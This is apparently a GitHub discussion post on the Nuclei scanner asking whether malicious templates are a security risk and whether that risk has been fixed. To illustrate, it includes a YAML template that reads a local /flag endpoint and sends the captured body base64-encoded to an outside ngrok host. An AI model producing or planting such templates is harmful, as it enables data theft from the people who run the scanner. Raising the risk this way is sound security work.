### DISCUSSION TITLE
Nuclei security

### DISCUSSION THREAD

**Discussion by BenJoice** [projectdiscovery/nuclei#5470] [Q&A]
Obviously malicious templates can be placed on the scanner. For example.

```yaml
requests:
  - method: GET
    path:
      - "http://127.0.0.1:1337/flag"
      - "http://111111111111.ngrok.io/{{base64(output)}}"
    extractors:
      - type: regex
        name: output
        part: body
        internal: true
```

Has the security issue with the scanner been resolved? If so, how. And please give some links to similar questions and research.
